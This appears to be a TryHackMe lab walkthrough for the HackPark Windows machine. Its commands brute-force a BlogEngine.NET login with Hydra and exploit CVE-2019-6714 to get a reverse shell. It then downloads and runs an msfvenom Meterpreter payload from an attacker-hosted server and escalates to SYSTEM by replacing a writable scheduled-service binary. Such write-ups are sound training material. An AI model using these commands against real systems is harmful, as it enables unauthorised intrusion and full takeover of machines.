HackPark | TryHackMe Walkthroughs

HackPark is a Windows machine featuring BlogEngine.NET exploitation. Learn to brute force web logins with Hydra, exploit CVE-2019-6714 for initial access, and use Windows Scheduler for privilege escalation.

The creepy clown on the website is Pennywise from Stephen King's "IT". Don't let him distract you from the real horror: unpatched web applications!

Reconnaissance

bash

1606070;"># Port scan
2nmap -sV -sC TARGET_IP
3606070;"># Results:
4606070;"># 80/tcp   - HTTP (IIS httpd 8.5)
5606070;"># 3389/tcp - RDP
6 
7606070;"># Web enumeration
8gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
9606070;"># Found: /admin, /content, /Account

The website is running BlogEngine.NET. Check the login page:

bash

1606070;"># Visit http://TARGET_IP/Account/login.aspx
2606070;"># Default user for BlogEngine is often 'admin'

Brute Force with Hydra

To brute force the login, we need to understand the POST request:

bash

1606070;"># Capture the login request with Burp or browser dev tools
2606070;"># POST parameters:
3606070;"># __VIEWSTATE=...
4606070;"># __EVENTVALIDATION=...
5606070;"># ctl00$MainContent$LoginUser$UserName=admin
6606070;"># ctl00$MainContent$LoginUser$Password=test
7606070;"># ctl00$MainContent$LoginUser$LoginButton=Log+in
8 
9606070;"># Failure message: "Login failed"

ASP.NET uses __VIEWSTATE and __EVENTVALIDATION tokens. Hydra can handle these, but you need to capture the exact parameter names.

bash

1606070;"># Hydra brute force
2hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP http-post-form 606070;">#a5d6ff;">"/Account/login.aspx:__VIEWSTATE=&__EVENTVALIDATION=&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Log+in:Login failed" -V
3 
4606070;"># Password found: 1qaz2wsx
5 
6606070;"># Alternative: Use Burp Intruder for more control

Hydra Syntax

Format: "page:parameters:failure_string". Use ^USER^ and ^PASS^ as placeholders. Escape $ with \$ in parameter names.

BlogEngine.NET Exploitation

After login, identify the BlogEngine version:

bash

1606070;"># Check version in admin panel or /admin/about.cshtml
2606070;"># BlogEngine.NET 3.3.6.0 - Vulnerable!
3 
4606070;"># Search for exploits
5searchsploit blogengine
6606070;"># BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution
7 
8606070;"># CVE-2019-6714 - file upload vulnerability in theme editing

CVE-2019-6714 Exploitation

Download Exploitsearchsploit -m aspx/webapps/46353.cs

Modify ExploitEdit IP and port in PostView.ascx

Upload FileAdmin → Content → Posts → Edit → File Manager → Upload PostView.ascx

TriggerVisit /?theme=../../App_Data/files to execute

bash

1606070;"># Get the exploit
2searchsploit -m aspx/webapps/46353.cs
3mv 46353.cs PostView.ascx
4 
5606070;"># Edit the file - change IP and PORT
6606070;"># TcpClient client = new TcpClient("YOUR_IP", 4444);
7 
8606070;"># In admin panel:
9606070;"># 1. Go to Content → Posts
10606070;"># 2. Edit any post
11606070;"># 3. Click the file manager icon
12606070;"># 4. Upload PostView.ascx
13 
14606070;"># Start listener
15nc -lvnp 4444
16 
17606070;"># Trigger the exploit
18curl 606070;">#a5d6ff;">"http://TARGET_IP/?theme=../../App_Data/files"
19 
20606070;"># Shell received!

Upgrading to Meterpreter

bash

1606070;"># Generate Meterpreter payload
2msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=5555 -f exe -o shell.exe
3 
4606070;"># Host it
5python3 -m http.server 80
6 
7606070;"># On target, download and execute
8powershell -c 606070;">#a5d6ff;">"Invoke-WebRequest -Uri http://YOUR_IP/shell.exe -OutFile C:\Windows\Temp\shell.exe"
9C:\Windows\Temp\shell.exe
10 
11606070;"># In Metasploit
12use multi/handler
13set payload windows/meterpreter/reverse_tcp
14set LHOST YOUR_IP
15set LPORT 5555
16run

Privilege Escalation

bash

1606070;"># Check system info
2systeminfo
3606070;"># Windows 2012 R2
4 
5606070;"># In Meterpreter
6meterpreter> getuid
7606070;"># Server username: IIS APPPOOLBlog
8 
9606070;"># Check for abnormal services
10meterpreter> shell
11C:> wmic service get name,displayname,pathname,startmode | findstr /i 606070;">#a5d6ff;">"auto" | findstr /i /v "c:windows"
12 
13606070;"># Found: WindowsScheduler in C:\Program Files (x86)\SystemScheduler\

The Windows Scheduler service runs with SYSTEM privileges and has interesting log files:

bash

1606070;"># Check scheduler logs
2type 606070;">#a5d6ff;">"C:\Program Files (x86)\SystemScheduler\Events\20198415519.INI_LOG.txt"
3 
4606070;"># Log shows:
5606070;"># 08/04/19 15:06:01,Event Started : Message.exe
6606070;"># The service runs Message.exe regularly as SYSTEM!
7 
8606070;"># Check permissions
9icacls 606070;">#a5d6ff;">"C:\Program Files (x86)\SystemScheduler\Message.exe"
10606070;"># Everyone has write access!

When a SYSTEM service executes a writable file, replace that file with a malicious payload to get SYSTEM access!

bash

1606070;"># Replace Message.exe with our shell
2606070;"># First, rename original
3move 606070;">#a5d6ff;">"C:\Program Files (x86)\SystemScheduler\Message.exe" "C:\Program Files (x86)\SystemScheduler\Message.exe.bak"
4 
5606070;"># Copy our shell
6copy C:\Windows\Temp\shell.exe 606070;">#a5d6ff;">"C:\Program Files (x86)\SystemScheduler\Message.exe"
7 
8606070;"># Wait for scheduled task or restart service
9606070;"># Shell received as SYSTEM!
10 
11meterpreter> getuid
12606070;"># NT AUTHORITY\SYSTEM

Getting Flags

bash

1606070;"># User flag
2type C:\Users\jeff\Desktop\user.txt
3 
4606070;"># Root flag
5type C:\Users\Administrator\Desktop\root.txt

Knowledge Check

Quick Quiz

Question 1 of 2

What vulnerability was exploited for initial access?

Key Takeaways

Web login brute forcing requires understanding POST parameters
BlogEngine.NET 3.3.6 is vulnerable to authenticated RCE
Scheduled tasks running writable executables enable privilege escalation
Always check service executable permissions on Windows
Log files reveal scheduled task behavior and timing

Related Lessons

Relevant

Service Exploitation

Authentication Attacks